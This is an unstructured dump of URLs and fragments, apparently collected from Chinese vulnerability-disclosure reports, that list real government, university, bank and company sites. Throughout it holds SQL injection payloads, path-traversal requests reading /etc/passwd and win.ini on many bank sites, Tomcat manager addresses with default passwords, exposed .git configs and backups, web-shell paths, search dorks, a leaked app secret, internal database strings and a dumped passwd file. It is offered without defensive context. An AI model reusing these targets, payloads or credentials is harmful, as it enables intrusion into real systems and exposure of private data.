http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz www.shuobozhaopin.com/Person/Per_Search_Base.asp gaobu.dgjob.cn/Person/Per_Search_Base.asp www.smrc.com/Person/Per_Search_Base.asp www.jobjp.cn/Person/Per_Search_Base.asp www.0566job.com/Person/Per_Search_Base.asp www.lsrc114.com/Person/Per_Search_Base.asp www.fhclm.com/Person/Per_Search_Base.asp http://math.sjtu.edu.cn/institution/qysd/listit1.php?id=2 http://math.sjtu.edu.cn/institution/qysd/listit1.php?id=-2%20union%20distinct%20select%20concat_ws%28%27:%27,@@datadir,version%28%29%29 site:chinare.gov.cn inurl:file http://www.chinare.gov.cn/table/down.php?file=*.doc http://www.betop-cn.com/data/mysql_error_trace.inc http://qc.legendsec.com/zecmd/zecmd.jsp http://res.njr.so:8000/login.jsp http://www.sipspf.org.cn/person_online/service/EmpInfo/getInfo?uname=00001000&thistype=firstdo http://zzjz2.edong.com/comment/class/index.php?myshownums=30&imageField.x=1&imageField.y=1&mid=&myord=dtime&catid=1&key=555-555-0199@example.com http://www.hawszl.gov.cn/web.rar http://59.252.32.44:8080/IPRCCOA/login_login2.action http://www.xysport.gov.cn/ http://mail.xysport.gov.cn/都是一样的 admin:admin http://114.80.136.111:8003//login.php http://cmri.hiall.com.cn/getMessage.php http://net.chinamobile.com/bbs/faq.php http://lsc.ecnu.edu.cn/admin/editdoc.asp?documentid=1006 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode= http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210396 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940603 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210355 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0541001500253 
http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0641050060004 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940683 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0641070360343 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210510 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210293 http://exam.chanjet.com/exam/portal/adminStudent!studentlogin.action http://zone.wooyun.org/content/17356 jdbc:oracle:thin:@10.11.68.20:1521:orcl https://member.meizu.com/intl/resetSuc.jsp?type=byemail&userName=FLY账号&useruri=http%3A%2F%2Fmember.meizu.com=(例如https://member.meizu.com/intl/resetSuc.jsp?type=byemail&userName=daynight&useruri=http%3A%2F%2Fmember.meizu.com) http://forum.meizu.com/space.php?uid=1224066 http://forum.meizu.com/member.php?action=list https://member.meizu.com/intl/enterAc.jsp?service=&appuri=&useruri=)只需要输入flyme账号和对应的邮箱即可发链接到邮箱重置密码【中文站是需要选择通过密保问题+邮箱 https://member.meizu.com/intl/emailAddr.jsp?isFlyme=1&userName=Flyme账号@flyme.cn&useruri=http://member.meizu.com),因此可以在第二步遍历邮箱 http://www.elongtian.com/kehuanli/ www.zzrc.cn http://211.100.224.148:7001/newsedit/batman/Login.jsp http://211.100.224.148:7001/newsedit/batman/Login.jsp inurl:cwgkview.aspx?tname= http://60.217.72.17:7081/ckq/cwgkview.aspx?tname=太平镇&CountryName=穆家村 http://123.134.189.60:8007/ckq/cwgkview.aspx?tname=辛庄镇&CountryName=团坡子村 http://nlw.gaoqing.gov.cn:8004/ckq/cwgkview.aspx?tname=田镇办&CountryName=前巩村 http://218.56.99.84:8003/ckq/cwgkview.aspx?tname=西河镇&CountryName=东庄村(张庄) http://222.134.66.54:8014/ckq/cwgkview.aspx?tname=起凤镇&CountryName=鱼一村 http://222.135.109.70:8200/ckq/cwgkview.aspx?tname=开发区&CountryName=林家泊社区 http://218.56.40.229:8041/ckq/cwgkview.aspx?tname=龙港街道&CountryName=庙张村 http://111.17.169.213:801/ckq/cwgkview.aspx?tname=南定镇&CountryName=三泉村 
https://open.weixin.qq.com/connect/oauth2/authorize?appid=wxf85ffaf05e3612b6&redirect_uri=http://183.63.133.147/yixin/guagua1/auth4share.jsp?cmd=guagua1Main&response_type=code&scope=snsapi_base&state=STATE#wechat_redirect http://mp.weixin.qq.com/debug/ http://mp.weixin.qq.com/wiki/14/89b871b5466b19b3efa4ada8e577d45e.html https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wxf85ffaf05e3612b6&secret=a4af06385e73a54fd01ddc706035f547 inurl:Default.aspx?deptid= http://222.135.127.190:7000/Swgk/Default.aspx?deptid=51 http://60.217.72.17:8000/Swgk/Default.aspx?deptid=20 http://61.133.119.187:8089/Swgk/Default.aspx?deptid=48 http://222.135.109.70:8100/Swgk/Default.aspx?&deptid=88 http://123.134.189.60:8012/swgk/default.aspx?deptid=394 http://221.2.149.47:8100/Swgk/Default.aspx?deptid=10 http://nlw.laiwu.gov.cn/swgk/default.aspx?deptid=3947 http://221.2.171.59:8000/Swgk/Default.aspx?deptid=52 http://bjd.tcl.com/activity.aspx?code=0301 http://bjd.tcl.com/Newslist.aspx?code=0401&page=10 http://bjd.tcl.com/Policy.aspx?code=0502 http://bjd.tcl.com/Productsb.aspx?code=0201 http://bjd.tcl.com/contact.aspx?code=0701 http://www.jxrcw.com/gwyWeb/search.aspx?gjz= http://www.aircraft_co.avic.com/listconent.php?cat_id=57&pid=13 http://www.55haitao.com/bbs/thread-934321-1-1.html www.dapu.com http://www.dapu.com http://wan.g.shangdu.com/GameInfo/NewsContent.aspx?newsId=1426 http://sqlmap.org http://www.sino-nz.com http://www.sino-nz.com/ http://www.bjbmc.co http://www.cefa.org.cn http://cx.chinacoop.gov.cn/ http://www.ccoopg.com/ http://city-base.net/ http://mkws.chinasafety.gov.cn/SystemManagement/login/login.aspx http://www.wandoujia.com/apps/com.tixa.lx.help https://github.com/naiyi/JiaodongOnlineNews/blob/master/JiaodongOnlineNews/Classes/JDOAppDelegate.m http://caiyun.feixin.10086.cn/dl/161CSQgcXwNz http://www.zgshfljjh.org/ http://www.zgshfljjh.org/test86.php http://www.cbsqx.gov.cn/)SQL注入漏洞泄露大量信息 http://www.cbsqx.gov.cn/about.php?id=435%27--%20- 
http://www.cbsqx.gov.cn/about.php?id=435--%20- http://www.bjzz.gov.cn/Article_Class.asp?ClassID=1 http://iczu.zju.edu.cn/zjdxlxszsxt/editor/admin/default.jsp http://zspt.jxvtc.edu.cn:8001/zsxt/editor/admin/default.jsp http://222.180.192.9:8026/zsxt/editor/admin/default.jsp http://zsxt.i.cqut.edu.cn:8008/zsxt/editor/admin/default.jsp http://zs.cqvie.edu.cn:7702/zsxt/editor/admin/default.jsp http://zsgz.ynnu.edu.cn/zsxt/editor/admin/default.jsp http://sfs.starapp.99.com/1.php http://vp.vlinkage.com/passport/login https://open.weixin.qq.com/connect/oauth2/authorize?appid=wx6fa7e3bab7e15415&redirect_uri=https://wxapp.tenpay.com/v2/hybrid/www/weixin/hongbao/receive.shtml?showwxpaytitle=1&sendid=1000000000201501092047478999&channelid=1&msgtype=1&from=singlemessage&isappinstalled=0&us=***********&ver=1&sign=***********&clientversion=26000238&devicetype=android-19&pass_ticket=***********&timeguid=14207873040300.4459930493030697&response_type=code&scope=snsapi_base&state=STATE&connect_redirect=1#wechat_redirect http://www.cjcm.com.cn/ http://www.xcfc.gov.cn/supercms.asp?typeid=12 http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018 http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018%20%27%20and%20%27a%27=%27a http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018%20%27%20and%20%27a%27=%27b http://app.info.hc360.com/imbiz/sanjishangquan.aspx?s_code= http://app.info.hc360.com/imbiz/searchr.aspx?Content=%c0%f1%c6%b7&id=0 http://coolshow.coolyun.com/service/fontdl.php?channel=0&cpid=2928925714&id=292892571 http://www.whfzb.gov.cn/site/upload/apple/800/2.html http://www.hbpp.com.cn/ http://www.hbpp.com.cn/news_info.php?typeid=13&id=764%22 http://www.hbpp.com.cn/news_info.php?typeid=13&id=764 http://210.45.240.15/edoas2/oa.jsp http://beta.cvh.org.cn/dc/w_sp_tree/taxa.php?selected_taxon=351&path=0,1,9,351 http://zabbix.llreader.com/ http://redmine.llreader.com/ xyk.jlu.edu.cn/accountlossList.action?uname=aaaa 
http://monthly.sinopecnews.com.cn/book/index.htm http://monthly.sinopecnews.com.cn/Usp/?pid=about&act=1 http://www.zsswj.gov.cn/admin/Login.asp http://v.ihaier.com/share/rsp_data/backup/ http://tieba.baidu.com/p/3518361113 http://tieba.baidu.com/p/3518361113 http://pan.baidu.com/share/link?uk=3224675704&shareid=3932337522&fid=1108861696333795 http://mo.gw.com.cn/mo.tar.gz http://chl.yinxunpay.com/login.action http://221.215.38.137:7001/czjm/login.action http://ocean.geodata.cn/Portal/SamplePreview?id=510301-10146 http://tibet.geodata.cn/Portal/SamplePreview?id=100111-10023 http://lake.geodata.cn/Portal/SamplePreview?id=210008-10060 http://159.226.22.201:9010/Portal/SamplePreview?id=100106-10041 http://wdcrre.geodata.cn/Portal/SamplePreview?id=100102-7 http://geospace.geodata.cn/Portal/SamplePreview?id=100107-10020 http://northeast.geodata.cn/Portal/SamplePreview?id=150081-10127 http://61.161.152.98:82/ http://61.161.152.98/ http://gxzol.com/index.php?m=admin&c=index&a=login&pc_hash= http://zsjggw.xnu.edu.cn/getcalendar.aspx?year=2015 http://p.hsort.com/getcalendar.aspx?year=2015 http://dztb.cufe.edu.cn/getcalendar.aspx?year=2015 http://epaper.btwhw.com/getcalendar.aspx?year=2015 http://www.yong-gang.com/getcalendar.aspx?year=2015 http://www.hnxwwy.cn/product_cate.asp?cate_id=1 http://www.hxwuye.com/product_cate.asp?cate_id=5 http://www.blbaoan.com/product_cate.asp?cate_id=1 http://www.myfcba.com/product_cate.asp?cate_id=1 http://www.xpjzbj.com/product_cate.asp?cate_id=5 http://www.wmwy.com.cn/product_cate.asp?cate_id=1 http://www.nnqlfz.com/product_cate.asp?cate_id=1 http://www.xishuizx.com/fytl/product_cate.asp?cate_id=1 http://www.fchgwy.com/product_cate.asp?cate_id=1 http://www.sdlzkt.com/product_cate.asp?cate_id=1 http://www.smxzy.com/product_cate.asp?cate_id=1 http://wmwy.com.cn/product_cate.asp?cate_id=1 http://www.dgygwy.com/product_cate.asp?cate_id=1 http://www.hwbaoan.com/xinfgs/heze/product_cate.asp?cate_id=1 
http://www.gzdexin.cn/product_cate.asp?cate_id=1 http://www.oceanglory.com/product_cate.asp?cate_id=1 http://www.kshcwy.com/product_cate.asp?cate_id=1 http://www.lygybwy.net/product_cate.asp?cate_id=1 http://123.233.240.91/index.do?dbsql=mysql http://bm.scs.gov.cn/2015/UserControl/Student/GradeQuery.aspx http://www.zzss.com/ http://**.**.**.**/net_zx.php?id=4 http://**.**.**.**/product_show.php?id=2 http://211.103.171.25/ http://zzb.whu.edu.cn/e/admin/,虽然不是什么标准的弱口令,但我还是猜出来了,你们猜猜看。 http://zzb.whu.edu.cn/e/admin/db/LoadInM.php,这里可以传后缀.mod的文件,建一个文件写入 http://auto.so.ku6.com:80/api/search.htm?q=%E7%A2%B0%E6%92%9E%20%E6%B5%8B%E8%AF%95&status=21&userid=22479334&quality=&duration=&order=1&offset=0&size=9&cb=jsonp1420817762131&redirect:xxx${13579246-1 https://github.com/fringzhao/MyGit/blob/994f5c1bb0b39606ebd8e4db540f74bc7d4547dd/Java/importData/DomainApply/src/com/hexun/web/util/mail/.svn/text-base/MailTest.java.svn-base http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax http://www.cccb.cn/front/main.action http://www.cccb.cn/wooyun.jsp jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web http://111.206.227.125 http://111.206.227.125/etc/sysconfig/network-scripts/ifcfg-eth0 http://www.cartel.tcl.com http://www.weimi.me/.git/config http://top.weimi.me/.git/config http://code.weimi.me/.git/config http://activity.weimi.me/.git/config http://admin.weimi.me/.git/config http://star.weimi.me/.git/config http://star.weimi.me/.git/ http://star.weimi.me/.git/ http://www.qceit.org.cn/certificateSearchList?code=e44 http://www.qceit.org.cn/search/search_all?key=2134 http://bbs.coolpad.com/poll/ http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31 http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31 http://www.wooyun.org/bugs/wooyun-2015-090920/trace/4030b3726978e7b5a30ee6371384c04a http://www.yungangbj.com/飞航通信 http://yungangbj.com/news/云冈信息网 http://220.194.48.137/Login.action 
http://183.56.145.195/action/front/indexAction_prepareIndex http://183.56.145.195:8085/SCSERC_COMMON/preViewDoc.action http://183.56.145.195:8085/SCSERC_COMMON/data.jsp http://www.51766.com/www2009/newhotel/search.jsp?nj=1&twoclass=1&prov_id=10011 http://www.117go.com/tour/new http://www.jsve.edu.cn/articles/2014/12/30/58119.htm http://js.jsve.edu.cn/jyb-zhongzhi/ http://www.dzjcy.gov.cn/ http://www.dzjcy.gov.cn/gongkai/jilv.php?catid=1 http://www.xfsx.gov.cn http://www.xfsx.gov.cn/LoginValidator_login http://www.xfsx.gov.cn/data.jsp http://www.xfsx.gov.cn/struts/webconsole.html http://www.herongdai.cn/dede/ http://www.zjgwater.gov.cn/book_views.asp?id=34 http://220.191.210.78:8081/kj_project/upload/ http://220.191.210.78:8081/kj_project/upload/upload.jsp?type=bszn http://www.hbav.gov.cn/phpmyadmin/ http://youju.gionee.com/ http://www.xfsx.gov.cn http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk,140117 http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk包含失败 http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../mag/util/download.jsp%00.apk,140117 http://bi.gionee.com/ www.qianxs.com)数据库未授权访问 http://www.qianxs.com ftp://61.147.115.77 https://vpn.telecomjs.com/prx/000/http/localhost/login www.cspro.org)。然后进入“我的信息”——“考生个人信息”页面。 url:http://58.56.128.100:80/manager/html user:admin pass:admin http://www.mgzfj.gov.cn/ http://www.mgzfj.gov.cn/shouye_Admin/,使用域名mgzfj作用户名,以mgzfj生成密码字典,burpsuit暴力破解登陆成功 http://nc.xhlbdc.com/epp/ http://nc.xhlbdc.com url:http://219.149.144.240:80/manager/html user:tomcat pass:tomcat http://mail.neusoft.edu.cn url:http://116.226.242.211:80/manager/html user:tomcat pass:tomcat url:http://116.226.242.211/sm/logout.do user:admin pass:admin http://awtrc.ict.ac.cn/wireless/index_content.php?newid=9 https://223.202.47.147 http://tongji.cmri.cn/misc/ url:http://60.18.248.42:80/manager/html user:tomcat pass:tomcat 
url:http://60.18.248.70:80/manager/html user:tomcat pass:tomcat url:http://116.255.157.55:80/manager/html user:tomcat pass:tomcat http://rainbow.tootoo.cn:83/playLive?DeviceId=1522 http://42.96.149.190/Menu3/Index url:http://220.191.210.26:80/manager/html user:admin pass:123456 http://202.98.11.111/qmGmamp/login.jsp user:admin pass:admin url:http://202.98.11.111:80/manager/html user:tomcat pass:tomcat http://www.spgbjy.gov.cn/ http://www.spgbjy.gov.cn//gbjy/xqdc/admin/index.asp,使用SQL注入登陆后台 url:http://219.138.224.95:80/manager/html user:admin url:http://219.148.7.4:80/manager/html user:admin pass:123 http://117.40.186.185:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://wssp.jdz.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://xzsp.jxgc.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.187.175:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://xzsp.jxyanshan.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://www.jaspw.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.188.34:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://111.75.198.33:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.131.172:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://111.75.198.33:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= url:http://58.211.238.57:80/manager/html user:admin pass:admin url:http://122.141.250.103:80/manager/html user:admin pass:admin http://211.80.224.35/StationWeb/pages/common/frameset.jsp http://211.80.224.35/jmx-console http://211.80.224.35/cmd1/ http://222.68.17.101/ http://ms.stv.sh.cn/ http://172.27.203.81:8080/ http://172.27.206.226/login/login.php?last_url=http://172.27.206.226/admin/admin.php http://172.27.243.159:8080/login/login.php http://ms.smg.sh.cn/ http://172.27.243.103/e/admin/admin.php http://ms.btc.sh.cn/ 
ftp://ftp.gx.cn ftp://ftp.yewu.cn https://172.24.201.50 https://172.28.190.68 http://www.qiushibaike.com/login http://218.98.34.166:8090/index.php http://218.98.34.166:8090/index.php http://218.98.34.166:8090/fckeditor/editor/ http://www.spgbjy.gov.cn:20992/index.asp http://www.ncwsj.gov.cn//uploads/1.php http://www.ncwsj.gov.cn//data/config.format.inc.php http://www.ncwsj.gov.cn/uploads/gb.php http://data.dichan.com/MediaDetails.aspx?ItemID=bac542dd-a677-45f5-b665-279a0ce57345 http://cwc.hnust.cn/pay/getpass.asp http://www.51766.com/www2009/dujia/search.jsp?startAdd=10044&prov_id=1004401&linetype=5 http://rrt.m-school.cn jdbc:mysql://192.168.20.105:3306/phpcms_v957?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/smapp?&useUnicode=true&characterEncoding=gbk&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_statistics?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt_center?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true 
jdbc:mysql://192.168.20.101:3306/xxt_survey2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/smapp_backup?&useUnicode=true&characterEncoding=gbk&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/gwapp?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_att?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true http://wooyun.org/bugs/wooyun-2010-066645 https://ssl.e-acic.cn 
url:http://211.152.43.83:80/manager/html user:admin pass:admin www.956122.com)是一个专注于为驾驶人提供道路交通违法照片查看、自助处罚、在线缴款的专业平台。 ftp://219.238.174.151/ http://www.ltxyt.com/XYT/DX/Paper/PaperInfo.aspx?id=2084 http://www.sqlmap.org www.ltxyt https://github.com/scott2lsb/doc/blob/8f37431fff86f2f3b68031fca65c8e8e842d1f47/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/%5B03%5D%E5%90%88%E4%BD%9C%E6%B8%A0%E9%81%93/%E4%B8%9A%E5%8A%A1%E6%8E%A5%E5%8F%A3/%5B04%5D%E5%B7%B2%E5%AF%B9%E6%8E%A5%E6%B8%A0%E9%81%93/%E6%98%93%E5%AE%9D/%E6%9C%8D%E5%8A%A1%E5%9C%B0%E5%9D%80.txt https://github.com/scott2lsb/client-server http://223.203.195.109:8080/log http://www.51openos.com/ http://www.1ypg.com/ http://www.1ypg.com/admin_back/admin.html http://www.1ypg.com/admin_back/toMailSet.action http://www.1ypg.com/admin_back/toUpdateUser.action?id=1001641331&backUrl=http://www.1ypg.com/admin_back/userListAll.action http://www.1ypg.com/admin_back/payInfo.action?id=alipay http://www.1ypg.com/admin_back/toMessageSet.action http://ffp.scal.com.cn http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList url:http://218.241.155.16:80/manager/html user:tomcat pass:tomcat http://byj.sjtu.edu.cn/web.rar url:http://122.194.12.23:80/manager/html user:tomcat pass:tomcat http://testwap.hexun.com/admin/index.jsp http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test http://182.50.0.139:8000/pmm/JSP/businessmanage/toZhuCe.action http://www.lfmz.gov.cn/ http://dg.uninx.com/dgpt/shop.php?shopid=5 http://www.sqlmap.org site:lenovo.com inurl:login找到这么一处后台 http://css.lenovo.com/lxymanage/login.php,后台有验证码,不过发现验证码仅仅是js校验的 http://css.lenovo.com/lxymanage/indexindex.php www.517na.com输入账号cs,密码000000进入系统,可以跳到3个分站, http://job.fesco.com.cn/company/Com_ReadBox.asp?param=1%20or%201=1%20and%20--%20 http://jiemu.ifeng.com/Resource/201105/cmd.aspx;.jpg http://jiemu.ifeng.com/Resource/201105/ http://jiemu.ifeng.com/Resource/ http://jiemu.ifeng.com/images/ 
http://portal.nwsuaf.edu.cn/eapdomain/static/component/cms/cmp_cms_password_find/findPassword.jsp http://portal.nwsuaf.edu.cn/eapdomain/component.shtml?name=cmp_cms_password_find&event=findPersonInfo&account=1234567&callback=stcCallback1026 http://www.51766.com/www2009/ajax/shop_et_ajax.jsp?cust_id=91walk&info_id=1103280648 http://www.51766.com/www2009/dujia/search.jsp?minPrice=0&maxPrice=10000&minDay=0&maxDay=30&inarea=&transfer=&linetype=&startAdd_name=%E5%B9%Bf%E4%B8%9C&to=%E5%B9%BF%E5%B7%9E&start_time=yyyy-mm-dd&end_time=yyyy-mm-dd http://zssj.lib.sjtu.edu.cn/wwwroot.rar http://58.83.202.123/ http://mas.bnu.edu.cn http://mas.bnu.edu.cn/serverLog.do?act=upload&fileName=../../../../../../../../../../etc/passwd http://www.strongsoft.net/ www.xtbank.com http://www.xtbank.com/download/download.jsp?filepath=/site902/uploadfiles/zxgg/1413941582458.xls&filename=1413941582458.xls&ei=Ht2xVLPgGpOnyASX34DACA&usg=AFQjCNGeC93YEDRmk2Km8iyVcBb7iv8VNQ http://www.xtbank.com/download/download.jsp?filepath=download/download.jsp http://www.xtbank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://ebank.pzhccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://qjccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.chengdebank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bankofhld.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.hengshuibank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.ccqtgb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bankoffs.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.yxccb.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini 
http://www.ccfccb.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bd-bank.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://183.64.83.109/hudong/VoteList.aspx http://219.222.244.59:6006/VoteList.aspx http://119.145.248.165:83/VoteList.aspx http://119.146.188.82:83/VoteList.aspx http://kjxyl.gdufs.edu.cn/hudong/VoteList.aspx http://121.32.136.50:701/gz_20141028/guangzhou/20141028/BadwebRemindPage.aspx?param=ABdXNlck5hbWU9MDIweHh4eHh4QDE2My5nZCZzcmNVcmw9d3d3LmJhaWR1LmNvbSZwb2xpY3lJZD0xMzc1JnNyY0lwPTEyNy4wLjAuMSZ0eXBlPTA= http://www.ahknchem.com/kndetailproe.php?id=1 http://www.hongrunchem.net/hongrundetailpro.php?id=1 http://st.guju.com.cn/ IP:203.166.163.201 http://aijianzi.gaosiedu.com/classlist/getClassClassificationList?xb=1 http://www.yile.com/recharge.php?cid=27 http://fwpt.smehlj.gov.cn/omp/search.action http://www.smehlj.gov.cn/omp/search.action http://www.51766.com/admin/shopSelf/seniority.jsp?custclass=6&prov_id=100 http://phed.cqu.edu.cn/eWebEditor/admin/default.asp http://phed.cqu.edu.cn/eWebEditor/admin/upload.asp http://phed.cqu.edu.cn/Edit/UploadFile/20141126133824963.asa http://phed.cqu.edu.cn/images/zu8989sdxk.asa http://bbs.tcl.com/aspcheck.asp http://www.07073.com/plus/jlist.phpid=1294 http://www.07073.com/plus/jlist.phpid=1294 http://dg.uninx.com/ http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian= http://dg.uninx.com/dgpt/list.php inurl:homeLogin.action inurl:homeLogin.action https://ebank.guilinbank.com.cn/jfyMall/default.do http://humanrights.nankai.edu.cn/?m=list&catid=3 http://jggswb.sjz12333.gov.cn:8102/eapdomain/login.do?method=begin http://jggswb.sjz12333.gov.cn:7001/console/login/LoginForm.jsp url:http://118.212.189.70:80/manager/html user:admin http://221.182.229.26/jyz/#/Default.xaml 
http://218.59.180.6:8888/dyjyz/#/Default.xaml http://220.163.128.58:8888/ynjyz/#/Default.xaml http://wooyun.org/bugs/wooyun-2013-027067 http://everysync.lenovo.com.cn/ url:http://222.222.62.76:80/manager/html user:admin pass:123 http://222.240.131.163/ url:http://124.161.245.144:80/manager/html user:admin pass:admin https://www.qiban365.com/zuhu/getpassword/Com_getPwd2.do http://www.itscholar.com/itsviewtopic.php?f=21&t=1774 http://www.itscholar.com/itsviewforum.php?f=21 http://www.itscholar.com/itcability.php?f=26&t=497 http://www.itscholar.com/Lesson/lesson.php?f=23&t=273 http://www.itscholar.com/css/ http://www.itscholar.com/tmp/ http://www.itscholar.com/itcability.php?f=26&t=497 http://www.itscholar.com/phpmyadmin/index.php http://www.itscholar.com/test.php http://www.itscholar.com/phpbb/ http://www.itscholar.com/code.php root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://www.spgbjy.gov.cn/zxpt/ admin:9999**可登陆后台 http://www.yiban.cn/toschool.php http://www.yiban.cn/ajax/reg_funcs.php?action=getNewclassBySchoolid&school_id=101 